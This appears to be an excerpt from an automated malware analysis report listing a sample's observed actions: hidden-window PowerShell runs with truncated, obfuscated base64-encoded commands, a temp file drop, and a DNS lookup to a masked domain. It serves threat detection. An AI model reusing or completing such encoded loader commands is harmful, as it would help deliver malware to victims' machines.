Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AEQAeABfAEEAWgBCAEEAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAtAGYAJwBTAEcAJwAsACcAQwBrAGMANAAnACwAJwBDADQAJwApADsAJABKAFEAQQBCAEEARwB4ADEAPQAuACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqAGUAJwArACcAYwB0AC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1952
- %TEMP%\1371825.cvr
- DNS ASK fu###60w.email
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AEQAeABfAEEAWgBCAEEAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAtAGYAJwBTAEcAJwAsACcAQwBrAGMANAAnACwAJwBDADQAJwApADsAJABKAFEAQQBCAEEARwB4ADEAPQAuACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqAGUAJwArACcAYwB0AC...' (with hidden window)